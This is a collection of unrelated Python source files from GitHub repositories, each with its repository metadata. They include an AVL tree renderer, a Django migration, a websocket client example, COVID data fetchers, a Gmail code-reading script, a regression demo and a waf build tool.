self.grandparent\n\n def find_uncle(self):\n if self.parent is None or self.grandparent is None:\n return None\n \n if self.parent is self.grandparent.left:\n return self.grandparent.right\n \n return self.grandparent.left\n #Funcion para renderizar el arbol\n def render_tree_graph(self):\n graph = pydot.Dot(graph_type=\"graph\")\n \n # viajar por el arbol segun el orden y agregar nodos al nivel\n queue = [(self, 1)]\n while queue:\n node, level = queue.pop(0)\n graph_node = pydot.Node(str(node.metric), label=\"Metric: {}\".format(node.metric))\n graph.add_node(graph_node)\n if node.left:\n left_node = pydot.Node(str(node.left.metric))\n graph.add_node(left_node)\n graph.add_edge(pydot.Edge(graph_node, left_node))\n queue.append((node.left, level + 1))\n if node.right:\n right_node = pydot.Node(str(node.right.metric))\n graph.add_node(right_node)\n graph.add_edge(pydot.Edge(graph_node, right_node))\n queue.append((node.right, level + 1))\n \n # Save the graph to a file\n graph.write_png(\"avl_tree_graph.png\")\n\n# Leer el dataset\ndata = pd.read_csv(\"co_properties_final.csv\")\n\n# Crear el arbol inicial\nroot = None\nfor x in range(0,len(data)):\n if root is None:\n root = TreeNode(data.loc[0])\n else:\n root.insert_node(data.loc[x])\n\n# Renderizar el arbol inicial\nroot.render_tree_graph()","repo_name":"jgayon/Lab_Est-Datos-2","sub_path":"Codigo.py","file_name":"Codigo.py","file_ext":"py","file_size_in_byte":9713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"1214572267","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Country',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=50, verbose_name='Name')),\n ('iso_code', models.CharField(unique=True, max_length=2, verbose_name='ISO code')),\n ('iso_numeric', models.CharField(unique=True, max_length=3, verbose_name='ISO numeric code')),\n ('iso_alpha3', models.CharField(unique=True, max_length=3, verbose_name='ISO alpha-3')),\n ('fips_code', models.CharField(unique=True, max_length=2, verbose_name='FIPS code')),\n ('continent', models.CharField(max_length=2, verbose_name='Continent')),\n ('capital', models.CharField(max_length=30, verbose_name='Capital', blank=True)),\n ('area_in_sq_km', models.FloatField(verbose_name='Area in square kilometers')),\n ('population', models.IntegerField(verbose_name='Population')),\n ('currency_code', models.CharField(max_length=3, verbose_name='Currency code')),\n ('languages', models.CharField(max_length=60, verbose_name='Languages')),\n ('geoname_id', models.IntegerField(verbose_name='Geonames ID')),\n ('bbox_west', models.FloatField()),\n ('bbox_north', models.FloatField()),\n ('bbox_east', models.FloatField()),\n ('bbox_south', models.FloatField()),\n ('num_people', models.IntegerField(default=0, verbose_name='Number of people')),\n ],\n options={\n 'ordering': ('name',),\n 'verbose_name': 'Country',\n 'verbose_name_plural': 'Countries',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='CountrySite',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=100, verbose_name='Title')),\n ('url', models.URLField(max_length=255, verbose_name='URL')),\n ('country', models.ForeignKey(\n verbose_name='Country', to='djangopeople.Country', on_delete=models.CASCADE,\n )),\n ],\n options={\n 'verbose_name': 'Country site',\n 'verbose_name_plural': 'Country sites',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='DjangoPerson',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('bio', models.TextField(verbose_name='Bio', blank=True)),\n ('latitude', models.FloatField(verbose_name='Latitude')),\n ('longitude', models.FloatField(verbose_name='Longitude')),\n ('location_description', models.CharField(max_length=50, verbose_name='Location')),\n ('photo', models.FileField(upload_to='profiles', blank=True)),\n ('profile_views', models.IntegerField(default=0, verbose_name='Profile views')),\n ('openid_server', models.URLField(max_length=255, verbose_name='OpenID server', blank=True)),\n ('openid_delegate', models.URLField(max_length=255, verbose_name='OpenID delegate', blank=True)),\n ('last_active_on_irc', models.DateTimeField(null=True, verbose_name='Last active on IRC', blank=True)),\n ('country', models.ForeignKey(\n verbose_name='Country', to='djangopeople.Country', on_delete=models.CASCADE,\n )),\n ],\n options={\n 'verbose_name': 'Django person',\n 'verbose_name_plural': 'Django people',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='PortfolioSite',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=100, verbose_name='Title')),\n ('url', models.URLField(max_length=255, verbose_name='URL')),\n ('contributor', models.ForeignKey(\n verbose_name='Contributor', to='djangopeople.DjangoPerson', on_delete=models.CASCADE,\n )),\n ],\n options={\n 'verbose_name': 'Portfolio site',\n 'verbose_name_plural': 'Portfolio sites',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Region',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('code', models.CharField(max_length=20, verbose_name='Code')),\n ('name', models.CharField(max_length=50, verbose_name='Name')),\n ('flag', models.CharField(max_length=100, verbose_name='Flag', blank=True)),\n ('bbox_west', models.FloatField()),\n ('bbox_north', models.FloatField()),\n ('bbox_east', models.FloatField()),\n ('bbox_south', models.FloatField()),\n ('num_people', models.IntegerField(default=0, verbose_name='Number of people')),\n ('country', models.ForeignKey(\n verbose_name='Country', to='djangopeople.Country', on_delete=models.CASCADE,\n )),\n ],\n options={\n 'ordering': ('name',),\n 'verbose_name': 'Region',\n 'verbose_name_plural': 'Regions',\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='djangoperson',\n name='region',\n field=models.ForeignKey(\n verbose_name='Region', blank=True, to='djangopeople.Region',\n null=True, on_delete=models.CASCADE,\n ),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='djangoperson',\n name='user',\n field=models.OneToOneField(\n verbose_name='User', to=settings.AUTH_USER_MODEL, on_delete=models.CASCADE,\n ),\n preserve_default=True,\n ),\n ]\n","repo_name":"WeilerWebServices/Django","sub_path":"djangopeople/djangopeople/djangopeople/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":6808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"36779196709","text":"from django.conf.urls import url\nfrom . import views\n\napp_name = 'order'\nurlpatterns = [\n url(r'^$', views.main_page, name='main_page'),\n url(r'^ordermeats/new/$', views.new_ordermeat, name='new_ordermeat'),\n url(r'^orderers/new/$', views.new_order, name='new_orderer'),\n url(r'^orderers/login/$', views.login_order, name='login_orderer'),\n url(r'^orderers/(?P\\d+)/orders/$', views.view_order, name='view_order'),\n url(r'^orders/new/$', views.new_order, name='new_order'),\n url(r'^.*$', views.redirect_main_page, name='redirect_main_page'),\n]","repo_name":"MTmeat/jihun-MT-meat","sub_path":"jihunMTmeat/order/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"86"} +{"seq_id":"12216513505","text":"import asyncio\nimport os\nfrom typing import Dict\n\nimport aiohttp\nfrom pydantic import BaseModel, ValidationError\n\n\nclass Response(BaseModel):\n result: str\n error: str\n stdout: str\n\n\nclass HumanPrompt(BaseModel):\n prompt: str\n\n\nasync def hitl_client(url: str, name: str, question: str, envs: Dict = {}):\n async with aiohttp.ClientSession() as session:\n async with session.ws_connect(f'{url}/{name}') as ws:\n print(f'Connected to {url}/{name}.')\n\n await ws.send_json(\n {\n \"question\": question,\n \"envs\": envs if envs else {},\n }\n )\n\n async for msg in ws:\n if msg.type == aiohttp.WSMsgType.TEXT:\n if msg.data == 'close cmd':\n await ws.close()\n break\n else:\n try:\n response = Response.parse_raw(msg.data)\n print(response.result, end='')\n except ValidationError:\n try:\n prompt = HumanPrompt.parse_raw(msg.data)\n answer = input(prompt.prompt + '\\n')\n await ws.send_str(answer)\n except ValidationError:\n print(f'Unknown message: {msg.data}')\n\n elif msg.type == aiohttp.WSMsgType.ERROR:\n print('ws connection closed with exception %s' % ws.exception())\n else:\n print(msg)\n\n\nasyncio.run(\n hitl_client(\n url='wss://langchain-72aff35874.wolf.jina.ai',\n name='hitl',\n question='What is Eric Zhu\\'s birthday?',\n envs={\n 'OPENAI_API_KEY': os.environ['OPENAI_API_KEY'],\n },\n )\n)\n","repo_name":"jina-ai/langchain-serve","sub_path":"examples/websockets/hitl/hitl_client.py","file_name":"hitl_client.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":1530,"dataset":"github-code","pt":"86"} +{"seq_id":"15595688811","text":"def make_requests():\n import requests\n import json\n r = requests.get('https://api.covid19india.org/data.json')\n package_json = r.json()\n r2 = requests.get('https://api.covid19india.org/state_district_wise.json')\n package_json_district = r2.json()\n package_str = json.dumps(package_json, indent=2)\n package_str_district = json.dumps(package_json_district, indent=2)\n return package_json, package_json_district\n\n\ndef find_state(state_dict):\n new_state_dict = {}\n new_state_dict['statecode'] = state_dict['statecode']\n new_state_dict['state'] = state_dict['state']\n new_state_dict['confirmed'] = state_dict['confirmed']\n new_state_dict['active'] = state_dict['active']\n new_state_dict['recovered'] = state_dict['recovered']\n new_state_dict['deaths'] = state_dict['deaths']\n return new_state_dict\n\n\ndef find_district(district_dict):\n new_district_dict = {}\n # new_district_dict['state'] = district_dict['state']\n new_district_dict['confirmed'] = district_dict['confirmed']\n new_district_dict['active'] = district_dict['active']\n new_district_dict['recovered'] = district_dict['recovered']\n new_district_dict['deaths'] = district_dict['deceased']\n return new_district_dict\n\n\ndef search(given_input):\n from data import make_requests\n\n package_json, package_json_district = make_requests()\n\n dict_state_search_found = {}\n dict_district_search_found = {}\n\n for state in package_json['statewise']:\n if given_input.lower() == state['state'].lower() or given_input.lower() == state['statecode'].lower():\n print(state, '\\n')\n dict_state_search_found[state['state']] = state\n elif given_input.lower() in state['state'].lower():\n dict_state_search_found[state['state']] = state\n # print(dict_state_search_found)\n # SAMPLE ELEMEMT : 'Maharashtra': {'active': '18381', 'confirmed': '24427', 'deaths': '921', 'deltaconfirmed': '0', 'deltadeaths': '0', 'deltarecovered': '0', 'lastupdatedtime': '12/05/2020 22:13:24', 'recovered': '5125', 'state': 'Maharashtra', 'statecode': 'MH', 'statenotes': '[10-May]
\\n- Total numbers are updated to the final figure reported for 10th May.
\\n- 665 cases added by MH govt. on 10th May due to data cleaning
\\n- 143 cases added by MH govt. on 5th May due to data cleaning
\\n- 796 cases added by MH govt. on 4th May due to data cleaning
'}\n\n for state_name in package_json_district.keys():\n for district in package_json_district[state_name]['districtData'].keys():\n if district.lower() == given_input.lower():\n dict_district_search_found[district] = package_json_district[state_name]['districtData'][district]\n elif given_input.lower() in district.lower():\n dict_district_search_found[district] = package_json_district[state_name]['districtData'][district]\n # print('\\n\\n', dict_district_search_found)\n # SAMPLE ELEMENT : 'North and Middle Andaman': {'notes': '', 'active': 0, 'confirmed': 1, 'deceased': 0, 'recovered': 1, 'delta': {'confirmed': 0, 'deceased': 0, 'recovered': 0}}\n return dict_state_search_found, dict_district_search_found\n\n\ndef find_total_state():\n from data import find_state\n from data import make_requests\n package_json, package_json_district = make_requests()\n full_dict_state = {}\n full_dict_state['India'] = find_state(data_country)\n for i in package_json['statewise'][1:]:\n full_dict_state[i['state']] = find_state(i)\n\n return full_dict_state\n\n\ndef get_country_data():\n from data import find_state\n from data import make_requests\n package_json, package_json_district = make_requests()\n data_country = package_json['statewise'][0]\n data_country['state'] = 'India'\n return data_country\n\n\ndef find_total_district():\n from data import make_requests\n from data import find_district\n package_json, package_json_district = make_requests()\n full_dict_district = {}\n\n for state_name in package_json_district.keys():\n for district in package_json_district[state_name]['districtData'].keys():\n add_this = find_district(\n package_json_district[state_name]['districtData'][district])\n add_this['district'] = district\n full_dict_district[district] = add_this\n return full_dict_district\n","repo_name":"Arnav17Sharma/Covid19India","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":4365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"1250849668","text":"#import the libraries\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.svm import SVR #support vector regression\r\n\r\n#get the dataset\r\ndataframe = pd.read_csv(\"Position_Salaries.csv\")\r\n\r\n#get the independant and dependant variables\r\nX = dataframe.iloc[: , 1].values\r\ny = dataframe.iloc[: , 2].values\r\n\r\n#reshape the arrays\r\nX = X.reshape(-1,1)\r\ny = y.reshape(-1,1)\r\n\r\n#implement feature scaling\r\nsc_X = StandardScaler()\r\nsc_y = StandardScaler()\r\nX = sc_X.fit_transform(X)\r\ny = sc_y.fit_transform(y)\r\n\r\n#fit the data to our model\r\nregressor = SVR(kernel='rbf') #radius basis function\r\nregressor.fit(X , y)\r\n\r\n#make the prediction values a numpy array and transform it into proper scale\r\nval = np.array([6.5]).reshape(-1,1)\r\nval = sc_X.transform(val)\r\nprediction = regressor.predict(val)\r\nprediction = sc_y.inverse_transform(prediction)\r\n\r\n#plot the graph\r\nX_grid = np.arange(min(X) , max(X) , 0.1)\r\nX_grid = X_grid.reshape((len(X_grid) , 1))\r\nplt.scatter(X , y , color=\"red\")\r\nplt.plot(X_grid , regressor.predict(X_grid) , color=\"green\")\r\nplt.title(\"truth salary (SVR model)\")\r\nplt.xlabel(\"level\")\r\nplt.ylabel(\"Salary\")\r\nplt.show()\r\n\r\n#print out the result\r\nprint(\"\\n\\nThe prediction made is \" , end=\"\")\r\nprint(prediction)\r\n","repo_name":"mikias21/Code-For-Algorithms-","sub_path":"svrmodel.py","file_name":"svrmodel.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"41048084140","text":"#!/usr/bin/env python\n# encoding: utf-8\n# Ali Sabil, 2007\n\n\"\"\"\nCompiles dbus files with **dbus-binding-tool**\n\nTypical usage::\n\n\tdef options(opt):\n\t\topt.load('compiler_c dbus')\n\tdef configure(conf):\n\t\tconf.load('compiler_c dbus')\n\tdef build(bld):\n\t\ttg = bld.program(\n\t\t\tincludes = '.',\n\t\t\tsource = bld.path.ant_glob('*.c'),\n\t\t\ttarget = 'gnome-hello')\n\t\ttg.add_dbus_file('test.xml', 'test_prefix', 'glib-server')\n\"\"\"\n\nfrom waflib import Task, Errors\nfrom waflib.TaskGen import taskgen_method, before_method\n\n@taskgen_method\ndef add_dbus_file(self, filename, prefix, mode):\n\t\"\"\"\n\tAdds a dbus file to the list of dbus files to process. Store them in the attribute *dbus_lst*.\n\n\t:param filename: xml file to compile\n\t:type filename: string\n\t:param prefix: dbus binding tool prefix (--prefix=prefix)\n\t:type prefix: string\n\t:param mode: dbus binding tool mode (--mode=mode)\n\t:type mode: string\n\t\"\"\"\n\tif not hasattr(self, 'dbus_lst'):\n\t\tself.dbus_lst = []\n\tif not 'process_dbus' in self.meths:\n\t\tself.meths.append('process_dbus')\n\tself.dbus_lst.append([filename, prefix, mode])\n\n@before_method('process_source')\ndef process_dbus(self):\n\t\"\"\"\n\tProcesses the dbus files stored in the attribute *dbus_lst* to create :py:class:`waflib.Tools.dbus.dbus_binding_tool` instances.\n\t\"\"\"\n\tfor filename, prefix, mode in getattr(self, 'dbus_lst', []):\n\t\tnode = self.path.find_resource(filename)\n\t\tif not node:\n\t\t\traise Errors.WafError('file not found ' + filename)\n\t\ttsk = self.create_task('dbus_binding_tool', node, node.change_ext('.h'))\n\t\ttsk.env.DBUS_BINDING_TOOL_PREFIX = prefix\n\t\ttsk.env.DBUS_BINDING_TOOL_MODE = mode\n\nclass dbus_binding_tool(Task.Task):\n\t\"\"\"\n\tCompiles a dbus file\n\t\"\"\"\n\tcolor = 'BLUE'\n\text_out = ['.h']\n\trun_str = '${DBUS_BINDING_TOOL} --prefix=${DBUS_BINDING_TOOL_PREFIX} --mode=${DBUS_BINDING_TOOL_MODE} --output=${TGT} ${SRC}'\n\tshell = True # temporary workaround for #795\n\ndef configure(conf):\n\t\"\"\"\n\tDetects the program dbus-binding-tool and sets ``conf.env.DBUS_BINDING_TOOL``\n\t\"\"\"\n\tconf.find_program('dbus-binding-tool', var='DBUS_BINDING_TOOL')\n\n","repo_name":"audacity/audacity","sub_path":"lib-src/lv2/lv2/waflib/Tools/dbus.py","file_name":"dbus.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":10471,"dataset":"github-code","pt":"86"} +{"seq_id":"70415223646","text":"import httplib2\nimport os\nfrom oauth2client import client, tools, file\nimport base64\nfrom googleapiclient import errors, discovery\nimport constants\nfrom bs4 import BeautifulSoup\nimport base64\n\ndef get_oath_credentials():\n home_dir = os.path.expanduser('~')\n credential_dir = os.path.join(home_dir, '.credentials')\n if not os.path.exists(credential_dir):\n os.makedirs(credential_dir)\n credential_path = os.path.join(credential_dir, constants.CREDENTIAL_FILE_NAME)\n store = file.Storage(credential_path)\n credentials = store.get()\n if not credentials or credentials.invalid:\n flow = client.flow_from_clientsecrets(constants.CLIENT_SECRET_FILE, constants.SCOPES)\n flow.user_agent = constants.APPLICATION_NAME\n credentials = tools.run_flow(flow, store)\n print(('Storing credentials to ' + credential_path))\n return credentials\n\ndef list_messages_matching_query(service, user_id, query=''):\n try:\n response = service.users().messages().list(userId=user_id, q=query).execute()\n messages = []\n if 'messages' in response:\n messages.extend(response['messages'])\n\n while 'nextPageToken' in response:\n page_token = response['nextPageToken']\n response = service.users().messages().list(userId=user_id, q=query,\n pageToken=page_token).execute()\n messages.extend(response['messages'])\n\n return messages\n except errors.HttpError as error:\n print('An error occurred: %s' % error)\n\ndef get_message(service, user_id, msg_id):\n try:\n message = service.users().messages().get(userId=user_id, id=msg_id).execute()\n # print('Message snippet: %s' % message['snippet'])\n return message\n except errors.HttpError as error:\n print('An error occurred: %s' % error)\n\ndef is_useful(headers):\n count = 0\n for header in headers:\n if header['name']=='Subject' and header['value'].strip()=='Verify Your Account':\n count += 1\n if header['name']=='From' and header['value'].strip()=='Instagram ':\n count += 1\n if count == 2:\n return True\n else:\n return False\n\ndef get_code(msg):\n bodydata = msg['payload']['body']['data']\n decoded_bodydata = base64.urlsafe_b64decode(bodydata)\n soup = BeautifulSoup(decoded_bodydata, features=\"html.parser\")\n f = soup.find('font')\n return f.contents[0]\n\ndef main():\n credentials = get_oath_credentials()\n http = credentials.authorize(httplib2.Http())\n service = discovery.build('gmail', 'v1', http=http)\n messages = list_messages_matching_query(service, \"me\", query=constants.QUERY_TERM)\n for message in messages:\n msg = get_message(service, \"me\", message['id'])\n headers = msg['payload']['headers']\n if is_useful(headers):\n print(get_code(msg))\n # break\n\nif __name__ == '__main__':\n main()\n","repo_name":"ishandutta2007/fetch-instagram-otp-from-gmail","sub_path":"fetch_from_mail.py","file_name":"fetch_from_mail.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"12292255834","text":"import os\nimport shutil\nimport sys\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--src', type=str, required=True, help='input directory')\nparser.add_argument('--stride', type=int, required=True, help='distance between samples')\nparser.add_argument('--dest', type=str, required=True, help='output directory')\nargs = parser.parse_args()\n\nin_dir = args.src\nstride = args.stride\nout_dir = args.dest\n\n# If stride is 3 and you have 4 files, file 3 will be moved leaving files 1, 2, and 4.\n# If stride is 3 you have 6 files files 3 and 6 will be moved leaving files 1, 2, 4, and 5.\n\nif not os.path.exists(out_dir):\n os.makedirs(out_dir)\n\ni=0\nfor basename in os.listdir(in_dir):\n if basename.endswith('.wav'):\n pathname = os.path.join(in_dir, basename)\n if os.path.isfile(pathname):\n if (i == 0):\n shutil.move(pathname, out_dir)\n # print(\"moving \" + pathname + \" to \" + out_dir)\n i = (i + 1) % stride","repo_name":"betandr/river","sub_path":"sample_files.py","file_name":"sample_files.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"86"} +{"seq_id":"19758783980","text":"from flask import Flask, request, jsonify\nfrom PIL import Image\nimport pytesseract\nimport numpy as np\nimport tensorflow as tf\nfrom keras.applications.vgg19 import VGG19\nfrom keras.layers import Dense, Flatten\nfrom keras.models import Model\nfrom keras.preprocessing.image import ImageDataGenerator\n\n\n\n\n\n\n\ndef pred(image1):\n weights1 = np.load('round-3-weights.npz')\n # # Construct the model architecture\n # model = tf.keras.Sequential([\n # tf.keras.layers.Dense(64, activation='relu', input_shape=(784,)),\n # tf.keras.layers.Dense(10, activation='softmax')\n # ])\n\n # # Compile the model\n # model.compile(optimizer='adam',\n # loss='sparse_categorical_crossentropy',\n # metrics=['accuracy'])\n \n # Load and compile Keras model\n vgg = VGG19(weights=weights1, include_top=False, input_shape=(112, 112, 3))\n # Freeze first 10 layers\n for layer in vgg.layers[:10]:\n layer.trainable = False\n x = vgg.output\n x = Flatten()(x)\n x = Dense(128, activation='relu')(x)\n x = Dense(256, activation='relu')(x)\n predictions = Dense(2, activation='softmax')(x) # change number of classes to 2 for covid and normal\n model = Model(inputs=vgg.input, outputs=predictions)\n model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])\n\n\n\n\n\n \n # Set the model weights\n model.set_weights([weights1[name] for name in weights1])\n # Make a prediction on new input data\n # x_test = np.random.randn(100, 784)\n # y_pred = model.predict(x_test)\n\n x_test = preprocess_image(image1)\n\n # Call the predict function with the preprocessed image\n y_pred = model.predict(x_test)\n\n return y_pred\n\n\ndef preprocess_image(image_path):\n # Load the image\n img = Image.open(image_path)\n\n # Resize the image to (112, 112)\n img = img.resize((112, 112))\n\n # Convert the image to a numpy array\n img_array = np.array(img)\n\n # Add an extra dimension to the image array for batching\n img_array = np.expand_dims(img_array, axis=0)\n\n # Normalize the image array\n img_array = img_array.astype('float32') / 255.0\n\n return img_array\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\napp = Flask(__name__)\n\n# Set Tesseract path for OCR\npytesseract.pytesseract.tesseract_cmd = '/usr/bin/tesseract'\n\n@app.route('/api/extract_text', methods=['POST'])\ndef extract_text():\n # Check if image file is present in the request\n if 'image' not in request.files:\n return jsonify({'error': 'no image found in request'}), 400\n\n # Read image file and convert to grayscale\n image_file = request.files['image']\n image = Image.open(image_file).convert('L')\n\n # Extract text from image using pytesseract\n # text = pytesseract.image_to_string(image)\n\n x=pred(image_file)\n result=\"positive\"\n accuracy=\"99%\"\n # Return text as response\n return jsonify({'result': x,\n 'accuracy':accuracy})\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n\n#commandline http request\n#curl -X POST -F \"image=@ocr_test.png\" http://localhost:5000/api/extract_text\n\n","repo_name":"Vaibhav13kamat/Covid-detection-FL","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"34484594546","text":"# luiz.augusto.farias@ccc.ufcg.edu.br\n\ndef meu_in(lista, elemento):\n for i in range(len(lista)):\n if lista[i] == elemento:\n return True\n\ndef eh_roteiro(iata, voos, cidades):\n lista = cidades.split(\"/\")\n \n for i in range(len(lista) - 1):\n if meu_in(voos[iata[lista[i]]], iata[lista[i + 1]]) == False:\n return False\n return True\n\niata = {\"Campina Grande\": \"CPV\",\n \"Recife\": \"REC\",\n \"Salvador\": \"SSA\",\n \"Brasilia\": \"BSB\",\n \"Sao Paulo\": \"GRU\",\n \"Rio de Janeiro\": \"GIG\"}\n\n\nvoos = {\"CPV\": [\"REC\", \"SSA\"],\n \"REC\": [\"CPV\", \"BSB\", \"GRU\", \"GIG\"],\n \"SSA\": [\"REC\", \"GRU\", \"GIG\"],\n \"BSB\": [\"CPV\", \"GIG\", \"GRU\"],\n \"GRU\": [\"GIG\", \"BSB\"],\n \"GIG\": [\"GRU\", \"REC\"]}\n\nassert eh_roteiro(iata, voos, \"Campina Grande/Recife/Rio de Janeiro\")\nassert eh_roteiro(iata, voos, \"Sao Paulo/Rio de Janeiro/Recife/Brasilia\")\nassert not eh_roteiro(iata, voos, \"Recife/Rio de Janeiro/Salvador/Recife\")","repo_name":"luizaugustoliveira/Algoritmos","sub_path":"Dicionários/roteiros_aeroportos/aeroportos.py","file_name":"aeroportos.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"1333994817","text":"from cnx_flip.models import *\nfrom .db import *\nimport transaction\nimport urllib2\nimport json\nimport xml.etree.ElementTree as ET\n\n\n\ndef test_db():\n mockCardsInTestDeck1 = {'deck_name': 'test_deck1',\n 'cards': [Card(term='term1', definition='def1'), \\\n Card(term='term2', definition='def2'), \\\n Card(term='term3', definition='def3'), \\\n Card(term='term4', definition='def4'), \\\n Card(term='term5', definition='def5'), \\\n Card(term='term6', definition='def6'), \\\n Card(term='term7', definition='def7')]}\n mockCardsInTestDeck2 = {'deck_name': 'test_deck2',\n 'cards':[Card(term='TERM1', definition='DEF1'), \\\n Card(term='TERM2', definition='DEF2'), \\\n Card(term='TERM3', definition='DEF3'), \\\n Card(term='TERM4', definition='DEF4'), \\\n Card(term='TERM5', definition='DEF5'), \\\n Card(term='TERM6', definition='DEF6'), \\\n Card(term='TERM7', definition='DEF7')]}\n mockCardsInTestDeck3 = {'deck_name': 'test_deck3',\n 'cards':[Card(term='haha1', definition='DEFINITION1'), \\\n Card(term='haha2', definition='DEFINITION2'), \\\n Card(term='haha3', definition='DEFINITION3'), \\\n Card(term='haha4', definition='DEFINITION4'), \\\n Card(term='haha5', definition='DEFINITION5'), \\\n Card(term='haha6', definition='DEFINITION6'), \\\n Card(term='haha7', definition='DEFINITION7')]}\n mockdecks = [mockCardsInTestDeck1, mockCardsInTestDeck2, mockCardsInTestDeck3]\n user_name = 'admin'\n \n with transaction.manager:\n\n for deck in mockdecks:\n # add cards\n deck_tmp = DBSession.query(Deck).filter(Deck.title==deck['deck_name'])\n if deck_tmp.count() == 0:\n deck_tmp = Deck(title=deck['deck_name'], color='green')\n else:\n deck_tmp = deck_tmp.first()\n deck_tmp.cards = deck['cards'] #If do not want to override cards\\\n # have to use deck_tmp + deck['cards']\n # link to the admin user\n admin = DBSession.query(User).filter(User.user_name==user_name)\n if admin.count == 0:\n admin = User(user_name=user_name)\n else:\n admin = admin.first()\n admin.decks.append(deck_tmp)\n\ndef importCardsFromCnxDb(uuid, deckid, cnxdbHost):\n # Build the request.\n # http://localhost:6543/xpath?id=e79ffde3-7fb4-4af3-9ec8-df648b391597&q=//*[local-name()=%22meaning%22]\n request_headers = {\n \"Accept\" : \"application/json\"\n # \"Authorization\" : \"Bearer 6879-1aVn-THALZjt82mlGqFRZZKMDV4Db1pGy0iO5xjUbeo\"\n }\n request_url = cnxdbHost + \"/xpath?id=\" + uuid + \"&q=//*[local-name()=%22definition%22]\"\n request = urllib2.Request(request_url, headers=request_headers)\n response = urllib2.urlopen(request).read()\n response = json.loads(response)\n \n # Error handling\n for module in response['results']:\n for term_def_wrap in module['xpath_results']:\n tree = ET.fromstring(term_def_wrap.encode('utf-8'))\n if len(tree) < 2 or tree[1].text == None or tree[0].text == None:\n continue\n\n term = tree[0].text.encode('utf-8')\n definition = tree[1].text.encode('utf-8')\n with transaction.manager:\n deck_tmp = DBSession.query(Deck).filter(Deck.id==deckid).first()\n card_tmp = Card(term=term, definition=definition, deck_id=deckid)\n deck_tmp.cards.append(card_tmp)\n\n# if __name__ == \"__main__\":\n# importCardsFromCnxDb(\"e79ffde3-7fb4-4af3-9ec8-df648b391597\", 1, \"http://localhost:6543\")\n # 5152cea8-829a-4aaf-bcc5-c58a416ecb66\n # importCardsFromCnxDb(\"5152cea8-829a-4aaf-bcc5-c58a416ecb66\", 1, \"http://localhost:6543\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"timm-lan/CNX_Flip","sub_path":"cnx_flip/importFromCnxDb.py","file_name":"importFromCnxDb.py","file_ext":"py","file_size_in_byte":4124,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"86"} +{"seq_id":"1185614363","text":"from gmplot import *\nfrom number2 import ADistance\nfrom Graph import Graph\nfrom geopy.geocoders import Nominatim\nimport plotly.plotly as py\nimport plotly.graph_objs as go\nimport pandas as pd\nimport RabinKarp\nimport webbrowser\nimport time\n\nstart = time.time()\n\nd = ADistance()\nlocations = ['Kuala Lumpur', 'Dhaka', 'Jakarta', 'Bandar Seri Begawan', 'Manila', 'Shanghai', 'Tokyo']\n\ncoord = []\nfor j in range(len(locations)):\n coord.append(d.get_coord_in_list(locations[j]))\n\ndf = pd.DataFrame(coord, columns=['x-cord', 'y-cord'], index=locations)\nprint(df)\nprint()\n\n# get latitude and longitude points of different cities\nlats, lons = zip(*coord)\n\n# declare center of the map\ngmap2 = gmplot.GoogleMapPlotter(3.1516636, 101.6943028, 6)\n\n# Scatter map\ngmap2.scatter(lats, lons, '#FF0000', size=50000, marker=False)\n\n# Plot method Draw a line in between given coordinates\n# Jakarta(-6.1753942, 106.827183)\n# Dhaka(23.7593572, 90.3788136)\n# Manila(14.5906216, 120.9799696)\n# Bandar Seri Begawan(4.8895453, 114.9417574)\n# Shanghai(31.2252985, 121.4890497)\n# Kuala Lumpur(3.1516636, 